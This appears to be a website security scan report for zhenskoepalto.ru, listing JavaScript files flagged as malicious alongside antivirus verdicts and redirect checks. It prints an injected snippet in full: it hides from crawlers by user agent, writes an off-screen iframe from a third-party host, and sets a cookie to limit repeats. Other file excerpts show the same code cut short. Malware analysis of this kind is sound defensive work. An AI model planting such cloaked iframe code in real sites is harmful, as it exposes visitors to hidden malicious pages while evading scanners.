Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zhenskoepalto.ru
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.zhenskoepalto.ru/ | 200 OK Content-Length: 56678 Content-Type: text/html | clean |
http://www.zhenskoepalto.ru/media/system/js/caption.js | 200 OK Content-Length: 2938 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki if ( element.title != "" ) { container.appendChild(text); } container.className = this.selector.replace('.', '_'); container.className = container.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); Antivirus reports:
| ||
http://www.zhenskoepalto.ru/templates/avignet_dream/js/jquery13.js | 200 OK Content-Length: 117854 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki this[0] == document ? Math.max( document.documentElement["client" + name], document.body["scroll" + name], document.documentElement["scroll" + name], document.body["offset" + name], document.documentElement["offset" + name] ) : size === undefined ? (this.length ? jQuery.css( this[0], type ) : null) : this.css( type, typeof size === "string" ? size : size + "px" ); }; });})(); }; Antivirus reports:
| ||
http://www.zhenskoepalto.ru/templates/avignet_dream/js/jquery_no_conflict.js | 200 OK Content-Length: 996 Content-Type: application/x-javascript | malicious |
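Malicious code - confirmed by antiviruses (see below). Note: this is the only excerpt on the page that shows the injected snippet in full; the other flagged files begin with the same code, but their excerpts are cut off at `getCooki`. The snippet appears to be prepended to the file's original content (`jQuery.noConflict();` follows it). It does nothing when the browser's user agent matches one of the listed strings or when the `akelbriston19ure` cookie is already set. Otherwise it writes an iframe positioned off-screen (`margin-top:-1002px`) that loads a page from a third-party host, then sets the cookie for 48 hours so the same browser is served the iframe only once in that window. Because of this gating, a crawler or scanner whose user agent is on the list will not see the iframe in rendered output; comparing the served files against a known-good copy is the more reliable check.
function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCookie("akelbriston19ure")===undefined);if(!h()&&i){document.write('<iframe width="112" height="132" style="position:absolute;margin-top:-1002px;" src="http://kardakov.cf/luckyblock17.html"></iframe>');var j=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+j.toUTCString()}})();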
jQuery.noConflict();; Antivirus reports:
| ||
http://www.zhenskoepalto.ru/templates/avignet_dream/js/s5_menu_active_and_parent_links.js | 200 OK Content-Length: 2063 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki if (s5_fm_li3[z3].parentNode.parentNode.id == "s5_navv") { if (s5_fm_li3[z3].innerHTML.indexOf("<UL") > 0 || s5_fm_li3[z3].innerHTML.indexOf("<ul") > 0) { if (s5_fm_li3[z3].className == "active") { s5_fm_li3[z3].className = "active s5_level_one_parent"; } else if (s5_fm_li3[z3].className != "active") { s5_fm_li3[z3].className = "s5_level_one_parent"; } } } }; Antivirus reports:
| ||
http://www.zhenskoepalto.ru//modules/mod_s5_tabshow/s5_tabshow/iCarousel.js/ | 404 Not Found Content-Length: 245 Content-Type: text/html | clean |
http://www.zhenskoepalto.ru/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.zhenskoepalto.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | 404 Not Found Content-Length: 2216 Content-Type: text/html | clean |
http://www.google.ru/coop/cse/brand?form=cse-search-box&lang=ru | 200 OK Content-Length: 2510 Content-Type: text/javascript | clean |
http://www.zhenskoepalto.ru/modules/mod_s5_accordion_menu/js/s5_accordion_menu.js | 200 OK Content-Length: 6695 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki s5_am_h3_first[s5_am_h3_first_y].className = "s5_am_toggler s5_am_open s5_am_not_parent"; } if (s5_am_h3_first[s5_am_h3_first_y].nextSibling.innerHTML != "" && s5_am_h3_first[s5_am_h3_first_y].nextSibling.innerHTML != " ") { s5_am_h3_first[s5_am_h3_first_y].className = "s5_am_toggler s5_am_open s5_am_parent"; } } } }); Antivirus reports:
| ||
http://www.zhenskoepalto.ru/templates/avignet_dream/js/s5_effects.js | 200 OK Content-Length: 2955 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zhenskoepalto.ru
Result:
GET / HTTP/1.1
Host: zhenskoepalto.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: zhenskoepalto.ru
Referer: http://www.google.com/search?q=zhenskoepalto.ru
Result:
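The result is similar to the first query. There are no suspicious redirects found. Note that this check compares HTTP responses only; the iframe injection in the scripts flagged above runs in the browser, so a clean result here does not contradict the "malicious" verdicts in the scanned-files table.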
GET / HTTP/1.1
Host: zhenskoepalto.ru
Referer: http://www.google.com/search?q=zhenskoepalto.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.